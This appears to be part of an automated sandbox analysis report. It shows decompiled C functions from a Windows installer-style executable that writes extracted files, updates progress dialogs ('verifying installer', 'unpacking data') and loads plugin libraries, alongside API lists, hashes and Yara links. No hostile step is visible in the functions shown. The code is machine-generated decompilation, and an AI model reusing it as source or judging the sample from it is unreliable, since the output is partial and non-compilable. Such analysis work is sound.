                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2320649405-0
                                                                                                                        • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                        • Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
                                                                                                                        • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                        • Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 93%
                                                                                                                        			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                                        0x0040267c
                                                                                                                        0x0040267e
                                                                                                                        0x0040268a
                                                                                                                        0x0040268d
                                                                                                                        0x00402697
                                                                                                                        0x0040269b
                                                                                                                        0x0040269b
                                                                                                                        0x004026a1
                                                                                                                        0x004026ae
                                                                                                                        0x004026b6
                                                                                                                        0x004026b9
                                                                                                                        0x004026bf
                                                                                                                        0x004026cd
                                                                                                                        0x004026d2
                                                                                                                        0x004026d6
                                                                                                                        0x004026d9
                                                                                                                        0x004026e2
                                                                                                                        0x004026ee
                                                                                                                        0x004026f2
                                                                                                                        0x004026f5
                                                                                                                        0x004026ff
                                                                                                                        0x0040271e
                                                                                                                        0x00402706
                                                                                                                        0x0040270b
                                                                                                                        0x00402713
                                                                                                                        0x00402716
                                                                                                                        0x0040271b
                                                                                                                        0x0040271b
                                                                                                                        0x00402725
                                                                                                                        0x00402725
                                                                                                                        0x00402737
                                                                                                                        0x0040273e
                                                                                                                        0x00402750
                                                                                                                        0x00402750
                                                                                                                        0x00402756
                                                                                                                        0x00402756
                                                                                                                        0x00402761
                                                                                                                        0x00402762
                                                                                                                        0x00402766
                                                                                                                        0x0040276a
                                                                                                                        0x00402770
                                                                                                                        0x00402770
                                                                                                                        0x00402777
                                                                                                                        0x00402164
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                                        • GlobalFree.KERNEL32 ref: 00402725
                                                                                                                        • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                                        • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                                        • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3294113728-0
                                                                                                                        • Opcode ID: b8defe13902d58a52973a2e3f60156d7c1400e5746f24ef4cd0721e59596b3c4
                                                                                                                        • Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
                                                                                                                        • Opcode Fuzzy Hash: b8defe13902d58a52973a2e3f60156d7c1400e5746f24ef4cd0721e59596b3c4
                                                                                                                        • Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E00404F04(long _a4, intOrPtr _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t26;
				long _t27;
				long _t28;
				signed int _t36;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t26 =  *0x423f54;
					_v12 = _t26;
					_t36 = _t26 & 0x00000001;
					if(_t36 == 0) {
						_t26 = E00405B88(0, _t36, 0x41fc78, 0x41fc78, _a4);
					}
					_push(0x41fc78);
					L00405B7C();
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t28 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t28 - _t36;
							SendMessageA(_v8, 0x1007 - _t36, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t36 != 0) {
							_t27 = _a4;
							 *((char*)(_t27 + 0x41fc78)) = 0;
							return _t27;
						}
					} else {
						_push(_a8);
						L00405B7C();
						_t26 = _t26 + _a4;
						if(_t26 < 0x800) {
							_push(_a8);
							_push(0x41fc78);
							L00405B82();
							goto L6;
						}
					}
				}
				return _t26;
			}
















                                                                                                                        0x00404f0a
                                                                                                                        0x00404f16
                                                                                                                        0x00404f19
                                                                                                                        0x00404f1f
                                                                                                                        0x00404f2b
                                                                                                                        0x00404f2e
                                                                                                                        0x00404f31
                                                                                                                        0x00404f37
                                                                                                                        0x00404f37
                                                                                                                        0x00404f3c
                                                                                                                        0x00404f3d
                                                                                                                        0x00404f45
                                                                                                                        0x00404f48
                                                                                                                        0x00404f65
                                                                                                                        0x00404f69
                                                                                                                        0x00404f72
                                                                                                                        0x00404f72
                                                                                                                        0x00404f7c
                                                                                                                        0x00404f85
                                                                                                                        0x00404f91
                                                                                                                        0x00404f98
                                                                                                                        0x00404f9c
                                                                                                                        0x00404f9f
                                                                                                                        0x00404fb2
                                                                                                                        0x00404fc0
                                                                                                                        0x00404fc0
                                                                                                                        0x00404fc4
                                                                                                                        0x00404fc6
                                                                                                                        0x00404fc9
                                                                                                                        0x00000000
                                                                                                                        0x00404fc9
                                                                                                                        0x00404f4a
                                                                                                                        0x00404f4a
                                                                                                                        0x00404f4d
                                                                                                                        0x00404f52
                                                                                                                        0x00404f5a
                                                                                                                        0x00404f5c
                                                                                                                        0x00404f5f
                                                                                                                        0x00404f60
                                                                                                                        0x00000000
                                                                                                                        0x00404f60
                                                                                                                        0x00404f5a
                                                                                                                        0x00404f48
                                                                                                                        0x00404fd3

                                                                                                                        APIs
                                                                                                                        • lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                        • lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                        • lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                                        • SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2531174081-0
                                                                                                                        • Opcode ID: 6f5438f81cf7a4cf278200178885afddebba4b3e10535ae1fdd8142835d36988
                                                                                                                        • Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
                                                                                                                        • Opcode Fuzzy Hash: 6f5438f81cf7a4cf278200178885afddebba4b3e10535ae1fdd8142835d36988
                                                                                                                        • Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c; // 0x0
					if(_t15 != 0) {
						_t15 =  *0x4071e8(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				__eflags =  *0x41704c; // 0x0
				if(__eflags != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                                        0x00402bdf
                                                                                                                        0x00402be1
                                                                                                                        0x00402be8
                                                                                                                        0x00402beb
                                                                                                                        0x00402beb
                                                                                                                        0x00402bf1
                                                                                                                        0x00000000
                                                                                                                        0x00402bf1
                                                                                                                        0x00402bf9
                                                                                                                        0x00402bff
                                                                                                                        0x00000000
                                                                                                                        0x00402c02
                                                                                                                        0x00402c09
                                                                                                                        0x00402c0f
                                                                                                                        0x00402c15
                                                                                                                        0x00402c17
                                                                                                                        0x00402c1d
                                                                                                                        0x00402c5b
                                                                                                                        0x00402c64
                                                                                                                        0x00000000
                                                                                                                        0x00402c69
                                                                                                                        0x00402c1f
                                                                                                                        0x00402c26
                                                                                                                        0x00402c37
                                                                                                                        0x00000000
                                                                                                                        0x00402c45
                                                                                                                        0x00402c26
                                                                                                                        0x00402c71

                                                                                                                        APIs
                                                                                                                        • 73BC9840.USER32(00000000,00000000), ref: 00402BEB
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C09
                                                                                                                        • wsprintfA.USER32 ref: 00402C37
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                          • Part of subcall function 00404F04: lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C69
                                                                                                                          • Part of subcall function 00402BB7: MulDiv.KERNEL32(00000000,00000064,?), ref: 00402BCC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Windowlstrlen$C9840CountCreateDialogParamShowTextTicklstrcatwsprintf
                                                                                                                        • String ID: ... %d%%
                                                                                                                        • API String ID: 570735199-2449383134
                                                                                                                        • Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                                        • Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
                                                                                                                        • Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                                        • Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                        0x004047e1
                                                                                                                        0x004047ee
                                                                                                                        0x004047f4
                                                                                                                        0x00404832
                                                                                                                        0x00404832
                                                                                                                        0x00404841
                                                                                                                        0x00404848
                                                                                                                        0x00000000
                                                                                                                        0x0040484a
                                                                                                                        0x004047f6
                                                                                                                        0x00404805
                                                                                                                        0x0040480d
                                                                                                                        0x00404810
                                                                                                                        0x00404822
                                                                                                                        0x00404828
                                                                                                                        0x0040482f
                                                                                                                        0x00000000
                                                                                                                        0x0040482f
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047EE
                                                                                                                        • GetMessagePos.USER32 ref: 004047F6
                                                                                                                        • ScreenToClient.USER32 ref: 00404810
                                                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404822
                                                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404848
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                        • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                        • Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
                                                                                                                        • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                        • Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                        0x00402b48
                                                                                                                        0x00402b56
                                                                                                                        0x00402b5c
                                                                                                                        0x00402b5c
                                                                                                                        0x00402b6a
                                                                                                                        0x00402b6c
                                                                                                                        0x00402b78
                                                                                                                        0x00402b7d
                                                                                                                        0x00402b7f
                                                                                                                        0x00402b7f
                                                                                                                        0x00402b8a
                                                                                                                        0x00402b9a
                                                                                                                        0x00402bac
                                                                                                                        0x00402bac
                                                                                                                        0x00402bb4

                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                                        • wsprintfA.USER32 ref: 00402B8A
                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402B9A
                                                                                                                        • SetDlgItemTextA.USER32 ref: 00402BAC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                        • API String ID: 1451636040-1158693248
                                                                                                                        • Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                                        • Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
                                                                                                                        • Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                                        • Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 59%
                                                                                                                        			E00401F51(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423f28 =  *0x423f28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F04(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af70, " ?B");
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                                                                                                                        0x00401f51
                                                                                                                        0x00401f51
                                                                                                                        0x00401f56
                                                                                                                        0x00401f5d
                                                                                                                        0x00402019
                                                                                                                        0x00402164
                                                                                                                        0x00402164
                                                                                                                        0x0040288b
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a
                                                                                                                        0x0040289a
                                                                                                                        0x00401f6c
                                                                                                                        0x00401f76
                                                                                                                        0x00401f79
                                                                                                                        0x00401f88
                                                                                                                        0x00401f92
                                                                                                                        0x00401f96
                                                                                                                        0x00402012
                                                                                                                        0x00000000
                                                                                                                        0x00402012
                                                                                                                        0x00401f98
                                                                                                                        0x00401fa2
                                                                                                                        0x00401fa6
                                                                                                                        0x00401fea
                                                                                                                        0x00401fa8
                                                                                                                        0x00401fab
                                                                                                                        0x00401fae
                                                                                                                        0x00401fde
                                                                                                                        0x00401fb0
                                                                                                                        0x00401fb3
                                                                                                                        0x00401fbc
                                                                                                                        0x00401fbe
                                                                                                                        0x00401fbe
                                                                                                                        0x00401fbc
                                                                                                                        0x00401fae
                                                                                                                        0x00401ff2
                                                                                                                        0x00402007
                                                                                                                        0x00402007
                                                                                                                        0x00000000
                                                                                                                        0x00401ff2
                                                                                                                        0x00401f82
                                                                                                                        0x00401f86
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                          • Part of subcall function 00404F04: lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                        • String ID: ?B
                                                                                                                        • API String ID: 2987980305-117478770
                                                                                                                        • Opcode ID: bbef6d334c2bb730698496685ff769ac622b2bb5dc5f46c6922e2c1a943cafbf
                                                                                                                        • Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
                                                                                                                        • Opcode Fuzzy Hash: bbef6d334c2bb730698496685ff769ac622b2bb5dc5f46c6922e2c1a943cafbf
                                                                                                                        • Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

